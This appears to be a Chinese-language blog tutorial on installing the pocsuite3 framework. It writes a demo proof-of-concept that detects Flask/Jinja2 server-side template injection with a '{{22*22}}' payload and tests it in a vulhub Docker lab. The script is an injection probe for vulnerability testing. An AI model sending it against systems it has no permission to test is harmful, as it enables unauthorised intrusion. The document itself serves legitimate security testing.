知道創宇的pocsuite3更新了。
https://github.com/knownsec/pocsuite3
一、安裝
安裝p'ython3.4以上
pip3 install pocsuite3
安裝完成後 控制檯輸入pocsuite,如下結果就是安裝成功了
二、poc測試
寫一個很簡單的poc測試flask的ssti漏洞
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
class DemoPOC(POCBase):
vulID = '111'
version = '3.0'
author = ['liao']
vulDate = '2017-12-14'
createDate = '2017-12-14'
updateDate = '2017-12-14'
references = ['https://github.com/vulhub/vulhub/tree/master/flask/ssti']
name = 'Flask(Jinja2) SSTI'
appPowerLink = ''
appName = 'flask'
appVersion = '1.x'
vulType = 'SSTI'
desc = '''
flask服務器模板注入漏洞
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
path = "/?name="
url = urljoin(self.url, path)
payload = "{{22*22}}"
resp = requests.get(url + payload)
try:
if resp and resp.status_code == 200 and "484" in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = payload
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
register_poc(DemoPOC)
三、本地搭建漏洞環境測試
使用docker搭建flask測試環境
https://github.com/vulhub/vulhub/tree/master/flask/ssti
四、run poc
直接命令行跑poc
這個只是很簡單的demo ,pocsuite3很強大,更多可以參考pocsuite3的文檔